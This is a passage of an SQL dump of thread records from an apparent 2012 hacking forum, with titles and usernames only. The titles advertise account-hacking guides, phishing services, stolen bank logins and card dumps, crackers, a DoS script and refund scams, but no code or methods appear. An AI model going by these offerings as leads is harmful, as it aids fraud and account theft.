'58', 'Reviewers Group???', '0', '0', '0', '1', 't3h jok3r', '1345937266', '968', '1346074485', 't3h jok3r', '1', '34', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('235', '48', 'Experiences of MOD', '0', '0', '0', '1', 't3h jok3r', '1345940778', '980', '1346256198', 'iTzIpod', '82', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('236', '49', '[Suggestion] Reporting Posts', '0', '0', '0', '82', 'iTzIpod', '1345951020', '1002', '1346015718', 't3h jok3r', '1', '21', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('237', '35', 'My attempt at a smudge tag [learning]', '0', '0', '0', '2', 'Apathy', '1345951622', '1010', '1345952881', 'iTzIpod', '82', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('238', '56', 'Ban the user above you', '0', '0', '0', '82', 'iTzIpod', '1345953707', '1021', '1352648045', 'iTzIpod', '82', '232', '89', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('239', '7', '1000th Post', '0', '0', '0', '82', 'iTzIpod', '1345954747', '1022', '1346073369', 'HoverCatz', '67', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('240', '3', '[Bug] Complaints & Rep Abuse Support', '0', '0', '0', '82', 'iTzIpod', '1345957663', '1025', '1346100208', 't3h jok3r', '1', '26', '6', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('241', '49', '[Suggestion] Questions Section', '0', '0', '0', '82', 'iTzIpod', '1345958174', '1028', '1346016098', 't3h jok3r', '1', '12', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('244', '33', 'Tips on rating GFX', '0', '0', '0', '82', 'iTzIpod', '1345961374', '1041', '1345986783', 'Apathy', '2', '12', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('242', '34', 'Will Smith Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1345959364', '1035', '1345959364', 'iTzIpod', '82', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('243', '34', 'Black Spiderman Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1345959485', '1036', '1345959485', 'iTzIpod', '82', '12', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('247', '16', '[Free][EBook] How to SE Pringles', '0', '0', '0', '82', 'iTzIpod', '1345991171', '1055', '1348618162', 'iTzIpod', '82', '28', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('246', '11', 'Safety for Safety\'s sake', '0', '0', '0', '48', 'BurnsH4X', '1345978650', '1045', '1346017364', 'swa4567', '10', '14', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('248', '16', '[Free][EBook] How to SE a 3DS', '0', '0', '0', '82', 'iTzIpod', '1345991325', '1056', '1348832469', 'iTzIpod', '82', '25', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('249', '56', 'Last person to reply, wins!', '0', '0', '0', '82', 'iTzIpod', '1345991527', '1057', '1352648005', 'iTzIpod', '82', '112', '41', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('250', '42', 'Saturday is deadliest day in Syrian civil war', '0', '0', '0', '82', 'iTzIpod', '1345994060', '1060', '1346016502', 't3h jok3r', '1', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('251', '19', '[Junk]sig', '0', '0', '0', '127', 'Eucliwood', '1346000124', '1063', '1346074969', 't3h jok3r', '1', '22', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('252', '54', 'August 27, 2012 XXXX Accounts', '0', '0', '0', '1', 't3h jok3r', '1346021770', '1089', '1346812916', 't3h jok3r', '1', '29', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('253', '56', 'Count to 200', '0', '0', '0', '84', 'Thunder™', '1346045869', '1106', '1352595874', 'XxTREYZxX', '257', '157', '62', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('254', '49', 'Gamers Section', '0', '0', '0', '84', 'Thunder™', '1346046025', '1107', '1347465982', 't3h jok3r', '1', '14', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('255', '5', 'IMPORTANT!!!', '0', '0', '0', '1', 't3h jok3r', '1346074273', '1121', '1346253574', 't3h jok3r', '1', '8', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('256', '3', '[Bug] View New Posts', '0', '0', '0', '82', 'iTzIpod', '1346082742', '1139', '1346100038', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('257', '35', 'Nice Video Edit', '0', '0', '0', '82', 'iTzIpod', '1346084981', '1141', '1348832128', 'iTzIpod', '82', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('258', '58', 'Recurring Team now...', '0', '0', '0', '54', 'Sin Cara', '1346085425', '1142', '1346101615', 't3h jok3r', '1', '29', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('259', '34', 'Instant\'s GFX Guide', '0', '0', '0', '82', 'iTzIpod', '1346093539', '1147', '1346645677', 'iTzIpod', '82', '18', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('260', '34', 'Afterburn Photoshop Tutorial', '0', '0', '0', '82', 'iTzIpod', '1346095927', '1150', '1346096112', 'iTzIpod', '82', '5', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('261', '34', 'Metroid Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1346096034', '1152', '1346096034', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('262', '43', 'Amazon Receipt Generator V.2', '0', '0', '0', '1', 't3h jok3r', '1346104450', '1171', '1346459638', 't3h jok3r', '1', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('263', '30', 'Emillionforums premium content: Extreme wiki poster', '0', '0', '0', '2', 'Apathy', '1346105023', '1172', '1346105023', 'Apathy', '2', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('264', '2', 'Something', '0', '0', '0', '1', 't3h jok3r', '1346105024', '1173', '1346115847', 't3h jok3r', '1', '55', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('265', '3', 'Apathy Demoted', '0', '0', '0', '1', 't3h jok3r', '1346109820', '1184', '1346620249', 'iTzIpod', '82', '124', '18', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('266', '47', 'Win a Free Netflix Account~', '0', '0', '0', '82', 'iTzIpod', '1346111714', '1186', '1348963581', 'iTzIpod', '82', '55', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('267', '3', '[Small Announcement] Userbars/Images Updated', '0', '0', '0', '82', 'iTzIpod', '1346113934', '1188', '1346252213', 'iTzIpod', '82', '53', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('268', '49', '[Suggestion] Forum News Section', '0', '0', '0', '82', 'iTzIpod', '1346114870', '1189', '1347477957', 'iTzIpod', '82', '18', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('269', '3', 'Group Image not working', '0', '0', '0', '55', 'Baws', '1346127095', '1212', '1346164105', 't3h jok3r', '1', '16', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('271', '53', 'Minecraft/Rsps coding', '0', '0', '0', '67', 'HoverCatz', '1346143024', '1230', '1346255864', 'iTzIpod', '82', '16', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('270', '7', 'Hi everyone', '0', '0', '0', '61', 'NXK', '1346136280', '1228', '1346383217', 'NXK', '61', '18', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('272', '4', 'Hello, I\'m Dreamer', '0', '0', '0', '138', 'Dreamer', '1346169102', '1243', '1346473640', 'Apathy', '2', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('273', '59', '????Free Spreading Complete Ebook????', '0', '0', '0', '138', 'Dreamer', '1346171506', '1249', '1349619274', '??zg???g????61', '100', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('277', '11', 'Any phreaking tutorials?', '0', '0', '0', '141', 'Bane™', '1346221819', '1304', '1346263823', 'Bane™', '141', '18', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('276', '4', 'Greetings.', '0', '0', '0', '141', 'Bane™', '1346197263', '1280', '1346254447', 't3h jok3r', '1', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('274', '42', 'Another death in the family for Sylvester Stallone', '0', '0', '0', '1', 't3h jok3r', '1346189604', '1274', '1347328804', 'Timmy', '5', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('275', '12', '[???]Hack Tons of YouTube Accounts. No Keylogging etc.[???]', '0', '0', '0', '5', 'Timmy', '1346189787', '1275', '1346210074', 'iTzIpod', '82', '23', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('278', '7', 'My first mybb theme [WIP]', '0', '0', '0', '54', 'Sin Cara', '1346252354', '1308', '1346374143', 't3h jok3r', '1', '19', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('279', '3', '[Bug] Awards are gone', '0', '0', '0', '82', 'iTzIpod', '1346256050', '1322', '1346270963', 't3h jok3r', '1', '15', '3', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('293', '16', 'How to SE fererro', '0', '0', '0', '154', 'fap', '1346370306', '1363', '1346814019', '??????Z', '112', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('281', '84', 'Upload N Sell Exploit', '0', '0', '0', '84', 'Thunder™', '1346261031', '1335', '1351463634', 'Timmy', '5', '77', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('282', '55', '[Request] Youtube Accounts', '0', '0', '0', '84', 'Thunder™', '1346261212', '1336', '1346287917', 'iTzIpod', '82', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('283', '14', 'Proxy List August 2012[Working]', '0', '0', '0', '84', 'Thunder™', '1346261697', '1337', '1346417623', 'MinecraftGeek', '150', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('284', '7', 'Typing Speed Test', '0', '0', '0', '84', 'Thunder™', '1346261768', '1338', '1346644149', 'Timmy', '5', '19', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('285', '12', 'How to track location of person on any chat box', '0', '0', '0', '84', 'Thunder™', '1346261829', '1339', '1348795909', 'Triple H', '4', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('286', '3', '[Announcement] Awards and IP Log History Features', '0', '0', '0', '1', 't3h jok3r', '1346270947', '1343', '1346640084', 't3h jok3r', '1', '27', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('287', '41', 'steam account', '0', '0', '0', '84', 'Thunder™', '1346300993', '1352', '1346300993', 'Thunder™', '84', '12', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('288', '19', '[Junk]Joker delete this', '0', '0', '0', '67', 'HoverCatz', '1346331326', '1353', '1346340893', 'JakeUS', '20', '12', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('289', '15', 'UploadNSell Exploit Program', '0', '0', '0', '67', 'HoverCatz', '1346331650', '1354', '1352011827', 't3h jok3r', '1', '96', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('290', '19', '[Junk][Junk]Our service is specialized on USA and CANADA dumps, but EUROPE/ASIA/WORLD dumps also', '0', '0', '0', '6', 'xlesnyx12', '1346348794', '1358', '1346348794', 'xlesnyx12', '6', '6', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('291', '19', '[Junk]BANK LOGINS FOR SALE UK BANK LOGIN IN STOCK: Abbey Fresh // Alliance & Leicester //', '0', '0', '0', '6', 'xlesnyx12', '1346349114', '1359', '1346349114', 'xlesnyx12', '6', '11', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('294', '16', 'How to se pringles,monster,hersheys,duracell and stride', '0', '0', '0', '154', 'fap', '1346370620', '1364', '1347013247', '??????Z', '112', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('295', '59', '[ebook] Crypter Blueprint', '0', '0', '0', '5', 'Timmy', '1346373955', '1368', '1346373955', 'Timmy', '5', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('296', '55', '[Req] 50 Cents paypal', '0', '0', '0', '61', 'NXK', '1346383149', '1373', '1346384327', 'iTzIpod', '82', '25', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('297', '7', 'My new Work', '0', '0', '0', '54', 'Sin Cara', '1346388713', '1377', '1346458522', 'iTzIpod', '82', '19', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('298', '9', '???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '0', '0', '159', 'Victori0us', '1346419973', '1383', '1347329518', 'Romdu62', '7', '27', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('304', '3', 'Explainations on recent events.', '0', '0', '0', '2', 'Apathy', '1346470631', '1414', '1346642327', 'Apathy', '2', '22', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('299', '3', 'Apathy Promoted!!!', '0', '0', '0', '1', 't3h jok3r', '1346458710', '1397', '1346620397', 'iTzIpod', '82', '24', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('300', '4', 'Whats up', '0', '0', '0', '162', 'Dingus', '1346458881', '1399', '1346458923', 'iTzIpod', '82', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('301', '25', 'Is keyscrambler good?', '0', '0', '0', '4', 'Triple H', '1346460501', '1404', '1346971772', 'p420', '9', '4', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('302', '53', 'Java DoS Script', '0', '0', '0', '4', 'Triple H', '1346460658', '1405', '1347649945', 'sirchamp', '53', '28', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('303', '4', 'Heyo', '0', '0', '0', '156', 'Omniscent', '1346465732', '1408', '1346642596', 't3h jok3r', '1', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('305', '84', 'Themejunkies.net theme rip', '0', '0', '0', '2', 'Apathy', '1346471373', '1415', '1351897285', 'VirtualLegend', '228', '33', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('306', '8', 'Annoying/Catchy Song? [KPOP]', '0', '0', '0', '82', 'iTzIpod', '1346594393', '1433', '1346620515', 'iTzIpod', '82', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('308', '3', 'Marketplace Removed', '0', '0', '0', '1', 't3h jok3r', '1346642463', '1453', '1346643789', 'Timmy', '5', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('307', '3', '[Announcement] T3h Jok3r is back!!!', '0', '0', '0', '1', 't3h jok3r', '1346640273', '1445', '1346688837', 'NXK', '61', '36', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('317', '61', 'Unique\'s Purpose', '0', '0', '0', '82', 'iTzIpod', '1346692068', '1489', '1347934563', 'iTzIpod', '82', '44', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('309', '61', 'Quick Announcement', '0', '0', '0', '1', 't3h jok3r', '1346642692', '1456', '1347413977', 'iTzIpod', '82', '16', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('310', '13', '[ HOT ] How to Hack Your School Grading System [Change]', '0', '0', '0', '5', 'Timmy', '1346643345', '1458', '1351035469', 'XxTREYZxX', '257', '48', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('311', '15', 'UploadNSell Scraper', '0', '0', '0', '5', 'Timmy', '1346643720', '1459', '1347080107', 'Timmy', '5', '23', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('312', '15', 'RKTs Admin Login Bruteforcer v1.0', '0', '0', '0', '8', 'spacefish36', '1346644365', '1467', '1346644365', 'spacefish36', '8', '16', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('314', '2', 'Testing Staff Message MyCode', '0', '0', '0', '1', 't3h jok3r', '1346645469', '1474', '1346645469', 't3h jok3r', '1', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('313', '52', '[VB.net Source] PayPal Cash System', '0', '0', '0', '1', 't3h jok3r', '1346644969', '1472', '1346716668', 't3h jok3r', '1', '25', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('315', '61', 'Welcome to Unique\'s HQ', '0', '0', '0', '82', 'iTzIpod', '1346646375', '1476', '1352588387', 'R?????zo?', '62', '59', '15', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('316', '4', 'Hello everyone.', '0', '0', '0', '166', '2112', '1346648382', '1480', '1346718817', 't3h jok3r', '1', '22', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('327', '5', 'Staff Notice in threads', '0', '0', '0', '1', 't3h jok3r', '1346718727', '1532', '1348973915', '??????????¢™', '3', '17', '3', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('318', '9', 'Want to Earn Money by doing Nothing ?', '0', '0', '0', '84', 'Thunder™', '1346695796', '1493', '1347493581', 'iTzIpod', '82', '43', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('319', '3', '[Bug] Gray/Grey Stars are bugged', '0', '0', '0', '82', 'iTzIpod', '1346697522', '1497', '1346700417', 't3h jok3r', '1', '17', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('320', '34', 'Fashion Dream Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1346702440', '1501', '1346708894', 'Apathy', '2', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('321', '34', 'Full Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1346702634', '1502', '1350599318', 'iTzIpod', '82', '26', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('322', '34', 'Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1346702729', '1503', '1346718534', 'iTzIpod', '82', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('323', '7', 'If I go inactive', '0', '0', '0', '82', 'iTzIpod', '1346704261', '1505', '1346961745', 'iTzIpod', '82', '66', '18', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('325', '7', 'Total users online', '0', '0', '0', '67', 'HoverCatz', '1346710974', '1515', '1346716145', 't3h jok3r', '1', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('326', '16', '[TUT] Free Restaurant Gift Cards.', '0', '0', '0', '166', '2112', '1346716335', '1520', '1347434323', '??????Z', '112', '26', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('328', '48', 'Mod Notice in threads', '0', '0', '0', '1', 't3h jok3r', '1346718764', '1533', '1350330679', 'VirtualLegend', '228', '18', '4', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('329', '46', 'New phi$hing theme service', '0', '0', '0', '17', 'khade009', '1346725132', '1536', '1346789028', 'khade009', '17', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('336', '7', 'Hope my work pays off', '0', '0', '0', '82', 'iTzIpod', '1346802503', '1586', '1346875327', 'iTzIpod', '82', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('330', '7', 'Request Exchange', '0', '0', '0', '53', 'sirchamp', '1346767124', '1544', '1346796380', 't3h jok3r', '1', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('331', '5', 'New Rules and Instructions v.5', '0', '0', '0', '1', 't3h jok3r', '1346767410', '1545', '1350330002', 't3h jok3r', '1', '32', '10', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('332', '4', 'Hello', '0', '0', '0', '172', 'MistaCode', '1346774569', '1549', '1347181707', 'MistaCode', '172', '34', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('333', '42', 'Six Degrees Made For Adult Students', '0', '0', '0', '7', 'Romdu62', '1346796544', '1565', '1347328849', 'Timmy', '5', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('334', '54', '[Brazzers/Mofos/Hustler/Naughtyamerica...// Sept-05-12]', '0', '0', '0', '1', 't3h jok3r', '1346797616', '1570', '1346797616', 't3h jok3r', '1', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('335', '25', 'ESET NOD32 Antivirus & ESET Smart Security Username And Password 4 sept 2012', '0', '0', '0', '5', 'Timmy', '1346798084', '1575', '1346972326', 'NXK', '61', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('337', '15', '[HOT] Syslogger LATEST VERSION [HOT]', '0', '2', '0', '171', 'W33D', '1346806276', '1587', '1347649070', '??zg???g????61', '100', '14', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('338', '4', 'Hola', '0', '0', '0', '112', '??????Z', '1346815667', '1597', '1346968042', '??????Z', '112', '29', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('339', '55', '[Req]Torrentleech invite', '0', '0', '0', '62', 'R?????zo?', '1346837105', '1601', '1346837105', 'R?????zo?', '62', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('340', '16', 'Free Nike\'s SE', '0', '0', '0', '112', '??????Z', '1346841602', '1604', '1346963257', '??????Z', '112', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('341', '54', 'Porn passes (big list)', '0', '0', '0', '62', 'R?????zo?', '1346878986', '1614', '1349387962', '??zg???g????61', '100', '30', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('342', '3', '[Announcement] Domain Change', '0', '0', '0', '82', 'iTzIpod', '1346885024', '1617', '1346885024', 'iTzIpod', '82', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('344', '3', 'Quick Updates and Notices V.2', '0', '0', '0', '1', 't3h jok3r', '1346900949', '1623', '1346971591', 'unixmoon', '13', '31', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('345', '63', 'Need userbar! [Gamers]', '0', '0', '1', '61', 'NXK', '1346962407', '1632', '1348461403', 'Triple H', '4', '192', '31', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('346', '19', '[Junk]Heads Up', '0', '0', '0', '82', 'iTzIpod', '1346964654', '1642', '1349127769', 'iTzIpod', '82', '10', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('347', '19', '[Junk]Warning', '0', '0', '0', '178', 'The Host', '1346966395', '1643', '1346966469', 't3h jok3r', '1', '9', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('348', '30', 'Brazzers Cracker', '0', '0', '0', '1', 't3h jok3r', '1346970335', '1647', '1347332768', 'Apathy', '2', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('349', '33', 'Everyone Read', '0', '0', '0', '82', 'iTzIpod', '1346970400', '1648', '1346973648', 'iTzIpod', '82', '15', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('350', '18', 'WESTi\'s Email Cracker (Crack Any E-Mail - Hotmail, Yahoo, Gmail)', '0', '0', '0', '1', 't3h jok3r', '1346970708', '1649', '1347329098', 'Timmy', '5', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('351', '46', 'Phishing Tutorial', '0', '0', '0', '8', 'spacefish36', '1346971069', '1651', '1349049375', 'spacefish36', '8', '23', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('352', '12', 'How to Take Down Websites Effectively + Proof', '0', '0', '0', '8', 'spacefish36', '1346971302', '1652', '1347237507', 'spacefish36', '8', '35', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('353', '13', '[Complete Guide]*How to crack All Sites Hosting With Apex!*[Complete Guide]', '0', '0', '0', '13', 'unixmoon', '1346971496', '1654', '1347677746', 'p420', '9', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('354', '23', '[MBAM] Self-Help Removal Tutorials', '0', '0', '0', '13', 'unixmoon', '1346971723', '1656', '1347237614', 'spacefish36', '8', '2', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('355', '25', '[TUT]Remove Win32:Sality virus and any other AV-blocking viruses', '0', '0', '0', '9', 'p420', '1346971856', '1658', '1346971856', 'p420', '9', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('356', '16', 'Haribo - SE', '0', '0', '0', '112', '??????Z', '1346978831', '1669', '1346978831', '??????Z', '112', '14', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('357', '3', '[Bug] Can\'t Rep?', '0', '0', '0', '82', 'iTzIpod', '1346979495', '1670', '1347069720', 't3h jok3r', '1', '18', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('359', '29', 'Easiest Hacking Technique EVER!', '0', '0', '0', '1', 't3h jok3r', '1347079022', '1691', '1347079022', 't3h jok3r', '1', '12', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('358', '3', 'Misconfigure, Unable & Cloudflare downtime', '0', '0', '0', '1', 't3h jok3r', '1347068867', '1677', '1347137522', 'JakeUS', '20', '30', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('360', '58', 'What are the official groups?', '0', '0', '0', '5', 'Timmy', '1347080163', '1694', '1347414149', 'iTzIpod', '82', '19', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('361', '54', 'Xbox live Code (1 Month)', '0', '0', '0', '172', 'MistaCode', '1347120296', '1702', '1347459005', 'NXK', '61', '30', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('362', '7', 'List of TOP 10 HACKERS', '0', '0', '0', '1', 't3h jok3r', '1347132958', '1705', '1347237432', 'spacefish36', '8', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('363', '8', 'Top 10 songs of September 2012', '0', '0', '0', '1', 't3h jok3r', '1347133364', '1706', '1347910227', 'iTzIpod', '82', '23', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('364', '12', 'How to hack accounts Hotmail/yahoo/Runescape/Minecraft/Porn [Guide By NXK]', '0', '0', '0', '61', 'NXK', '1347137768', '1708', '1347137768', 'NXK', '61', '0', '0', '', '0', '0', '0', '', '-2', '0', '0', '0'); INSERT INTO mybb_threads VALUES('365', '3', 'HAHA SHIT 